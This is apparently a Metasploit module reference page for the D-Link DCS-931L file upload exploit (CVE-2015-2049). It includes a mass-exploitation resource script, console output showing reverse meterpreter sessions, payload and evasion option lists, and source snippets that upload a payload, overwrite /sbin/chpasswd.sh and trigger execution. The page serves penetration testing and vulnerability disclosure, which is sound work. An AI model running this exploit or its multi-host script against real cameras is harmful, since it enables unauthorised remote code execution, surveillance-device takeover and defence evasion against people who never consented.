D-Link DCS-931L File Upload - Metasploit


This page contains detailed information about how to use the exploit/linux/http/dlink_dcs931l_upload metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: D-Link DCS-931L File Upload
Module: exploit/linux/http/dlink_dcs931l_upload
Source code: modules/exploits/linux/http/dlink_dcs931l_upload.rb
Disclosure date: 2015-02-23
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2015-2049

This module exploits a file upload vulnerability in D-Link DCS-931L network cameras. The setFileUpload functionality allows authenticated users to upload files to anywhere on the file system, allowing system files to be overwritten, resulting in execution of arbitrary commands. This module has been tested successfully on a D-Link DCS-931L with firmware versions 1.01_B7 (2013-04-19) and 1.04_B1 (2014-04-21). D-Link DCS-930L, DCS-932L, DCS-933L models are also reportedly affected, but untested.

Module Ranking and Traits


Module Ranking:

  • great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.

Basic Usage


Using dlink_dcs931l_upload against a single host

Normally, you can use exploit/linux/http/dlink_dcs931l_upload this way:

msf > use exploit/linux/http/dlink_dcs931l_upload
msf exploit(dlink_dcs931l_upload) > show targets
    ... a list of targets ...
msf exploit(dlink_dcs931l_upload) > set TARGET target-id
msf exploit(dlink_dcs931l_upload) > show options
    ... show and set options ...
msf exploit(dlink_dcs931l_upload) > exploit

Using dlink_dcs931l_upload against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your dlink_dcs931l_upload will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/dlink_dcs931l_upload")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/http/dlink_dcs931l_upload exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/dlink_dcs931l_upload

[*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp
msf6 exploit(linux/http/dlink_dcs931l_upload) > show info

       Name: D-Link DCS-931L File Upload
     Module: exploit/linux/http/dlink_dcs931l_upload
   Platform: Linux
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2015-02-23

Provided by:
  Mike Baucom
  Allen Harper
  J. Rach
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Linux mipsle Payload

Check supported:
  Yes

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  HttpPassword                   no        Camera password (default: blank)
  HttpUsername  admin            yes       Camera username
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         80               yes       The target port (TCP)
  SSL           false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                          no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  This module exploits a file upload vulnerability in D-Link DCS-931L 
  network cameras. The setFileUpload functionality allows 
  authenticated users to upload files to anywhere on the file system, 
  allowing system files to be overwritten, resulting in execution of 
  arbitrary commands. This module has been tested successfully on a 
  D-Link DCS-931L with firmware versions 1.01_B7 (2013-04-19) and 
  1.04_B1 (2014-04-21). D-Link DCS-930L, DCS-932L, DCS-933L models are 
  also reportedly affected, but untested.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2015-2049
  https://tangiblesecurity.com/index.php/announcements/tangible-security-researchers-notified-and-assisted-d-link-with-fixing-critical-device-vulnerabilities
  http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10049

Module Options


This is a complete list of options available in the linux/http/dlink_dcs931l_upload exploit:

msf6 exploit(linux/http/dlink_dcs931l_upload) > show options

Module options (exploit/linux/http/dlink_dcs931l_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        Camera password (default: blank)
   HttpUsername  admin            yes       Camera username
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                          no        HTTP server virtual host

Payload options (linux/mipsle/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux mipsle Payload

Advanced Options


Here is a complete list of advanced options supported by the linux/http/dlink_dcs931l_upload exploit:

msf6 exploit(linux/http/dlink_dcs931l_upload) > show advanced

Module advanced options (exploit/linux/http/dlink_dcs931l_upload):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (linux/mipsle/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/dlink_dcs931l_upload module can exploit:

msf6 exploit(linux/http/dlink_dcs931l_upload) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux mipsle Payload

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/dlink_dcs931l_upload exploit:

msf6 exploit(linux/http/dlink_dcs931l_upload) > show payloads

Compatible Payloads
===================

   #  Name                                          Disclosure Date  Rank    Check  Description
   -  ----                                          ---------------  ----    -----  -----------
   0  payload/generic/custom                                         normal  No     Custom Payload
   1  payload/generic/shell_bind_tcp                                 normal  No     Generic Command Shell, Bind TCP Inline
   2  payload/generic/shell_reverse_tcp                              normal  No     Generic Command Shell, Reverse TCP Inline
   3  payload/linux/mipsle/exec                                      normal  No     Linux Execute Command
   4  payload/linux/mipsle/meterpreter/reverse_tcp                   normal  No     Linux Meterpreter, Reverse TCP Stager
   5  payload/linux/mipsle/reboot                                    normal  No     Linux Reboot
   6  payload/linux/mipsle/shell/reverse_tcp                         normal  No     Linux Command Shell, Reverse TCP Stager
   7  payload/linux/mipsle/shell_bind_tcp                            normal  No     Linux Command Shell, Bind TCP Inline
   8  payload/linux/mipsle/shell_reverse_tcp                         normal  No     Linux Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/dlink_dcs931l_upload exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/dlink_dcs931l_upload) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

uploadfile.htm does not exist


Here is a relevant code snippet related to the "uploadfile.htm does not exist" error message:

73:	      vprint_status("The connection timed out.")
74:	      return Exploit::CheckCode::Unknown
75:	    end
76:	
77:	    if res.code && res.code == 404
78:	      vprint_status("uploadfile.htm does not exist")
79:	      return Exploit::CheckCode::Safe
80:	    elsif res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS\-931L"/
81:	      vprint_error("Authentication failed")
82:	      return Exploit::CheckCode::Detected
83:	    elsif res.code && res.code == 200 && res.body && res.body =~ /Upload File/

Authentication failed


Here is a relevant code snippet related to the "Authentication failed" error message:

76:	
77:	    if res.code && res.code == 404
78:	      vprint_status("uploadfile.htm does not exist")
79:	      return Exploit::CheckCode::Safe
80:	    elsif res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS\-931L"/
81:	      vprint_error("Authentication failed")
82:	      return Exploit::CheckCode::Detected
83:	    elsif res.code && res.code == 200 && res.body && res.body =~ /Upload File/
84:	      return Exploit::CheckCode::Vulnerable
85:	    end
86:	    Exploit::CheckCode::Safe

<PEER> - Connection failed


Here is a relevant code snippet related to the "<PEER> - Connection failed" error message:

91:	
92:	    # upload payload
93:	    res = upload(payload_path, generate_payload_exe)
94:	
95:	    unless res
96:	      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
97:	    end
98:	
99:	    if res.code && res.code == 404
100:	      fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
101:	    elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/

<PEER> - Authentication failed or setFileUpload functionality does not exist


Here is a relevant code snippet related to the "<PEER> - Authentication failed or setFileUpload functionality does not exist" error message:

95:	    unless res
96:	      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
97:	    end
98:	
99:	    if res.code && res.code == 404
100:	      fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
101:	    elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
102:	      print_good("Payload uploaded successfully")
103:	    else
104:	      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload")
105:	    end

<PEER> - Unable to upload payload


Here is a relevant code snippet related to the "<PEER> - Unable to upload payload" error message:

99:	    if res.code && res.code == 404
100:	      fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
101:	    elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
102:	      print_good("Payload uploaded successfully")
103:	    else
104:	      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload")
105:	    end
106:	    register_file_for_cleanup(payload_path)
107:	
108:	    # overwrite /sbin/chpasswd.sh with stub
109:	    res = upload('/sbin/chpasswd.sh', "#!/bin/sh\n#{payload_path}&\n")

<PEER> - Connection failed


Here is a relevant code snippet related to the "<PEER> - Connection failed" error message:

107:	
108:	    # overwrite /sbin/chpasswd.sh with stub
109:	    res = upload('/sbin/chpasswd.sh', "#!/bin/sh\n#{payload_path}&\n")
110:	
111:	    unless res
112:	      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
113:	    end
114:	
115:	    if res.code && res.code == 404
116:	      fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
117:	    elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/

<PEER> - Authentication failed or setFileUpload functionality does not exist


Here is a relevant code snippet related to the "<PEER> - Authentication failed or setFileUpload functionality does not exist" error message:

111:	    unless res
112:	      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
113:	    end
114:	
115:	    if res.code && res.code == 404
116:	      fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
117:	    elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
118:	      print_good("Stager uploaded successfully")
119:	    else
120:	      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager")
121:	    end

<PEER> - Unable to upload stager


Here is a relevant code snippet related to the "<PEER> - Unable to upload stager" error message:

115:	    if res.code && res.code == 404
116:	      fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
117:	    elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
118:	      print_good("Stager uploaded successfully")
119:	    else
120:	      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager")
121:	    end
122:	
123:	    # execute payload using stub
124:	    res = send_request_cgi(
125:	      'method' => 'POST',

ReplyErrorPage


Here is a relevant code snippet related to the "ReplyErrorPage" error message:

125:	      'method' => 'POST',
126:	      'uri' => normalize_uri('setSystemAdmin'),
127:	      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
128:	      'vars_post' => Hash[{
129:	        'ReplySuccessPage' => 'advanced.htm',
130:	        'ReplyErrorPage' => 'errradv.htm',
131:	        'ConfigSystemAdmin' => 'Apply'
132:	      }.to_a.shuffle])
133:	
134:	    unless res
135:	      fail_with(Failure::Unreachable, "#{peer} - Connection failed")

<PEER> - Connection failed


Here is a relevant code snippet related to the "<PEER> - Connection failed" error message:

130:	        'ReplyErrorPage' => 'errradv.htm',
131:	        'ConfigSystemAdmin' => 'Apply'
132:	      }.to_a.shuffle])
133:	
134:	    unless res
135:	      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
136:	    end
137:	
138:	    if res.code && res.code == 401
139:	      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
140:	    elsif res.code && res.code == 200 && res.body

<PEER> - Authentication failed


Here is a relevant code snippet related to the "<PEER> - Authentication failed" error message:

134:	    unless res
135:	      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
136:	    end
137:	
138:	    if res.code && res.code == 401
139:	      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
140:	    elsif res.code && res.code == 200 && res.body
141:	      print_good("Payload executed successfully")
142:	    else
143:	      fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed")
144:	    end

<PEER> - Payload execution failed


Here is a relevant code snippet related to the "<PEER> - Payload execution failed" error message:

138:	    if res.code && res.code == 401
139:	      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
140:	    elsif res.code && res.code == 200 && res.body
141:	      print_good("Payload executed successfully")
142:	    else
143:	      fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed")
144:	    end
145:	  end
146:	
147:	  #
148:	  # Replace chpasswd.sh with original contents

Could not restore /sbin/chpasswd.sh to default


Here is a relevant code snippet related to the "Could not restore /sbin/chpasswd.sh to default" error message:

167:	EOF
168:	    res = upload('/sbin/chpasswd.sh', chpasswd)
169:	    if res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
170:	      vprint_good("Restored /sbin/chpasswd.sh successfully")
171:	    else
172:	      vprint_warning("Could not restore /sbin/chpasswd.sh to default")
173:	    end
174:	  end
175:	
176:	  #
177:	  # Upload a file to a specified path

Content-Disposition: form-data; name="ReplyErrorPage"rn


Here is a relevant code snippet related to the "Content-Disposition: form-data; name="ReplyErrorPage"rn" error message:

182:	    boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}"
183:	    post_data  = "--#{boundary}\r\n"
184:	    post_data << "Content-Disposition: form-data; name=\"ReplySuccessPage\"\r\n"
185:	    post_data << "\r\nreplyuf.htm\r\n"
186:	    post_data << "--#{boundary}\r\n"
187:	    post_data << "Content-Disposition: form-data; name=\"ReplyErrorPage\"\r\n"
188:	    post_data << "\r\nreplyuf.htm\r\n"
189:	    post_data << "--#{boundary}\r\n"
190:	    post_data << "Content-Disposition: form-data; name=\"Filename\"\r\n"
191:	    post_data << "\r\n#{path}\r\n"
192:	    post_data << "--#{boundary}\r\n"

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Mike Baucom
  • Allen Harper
  • J. Rach
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.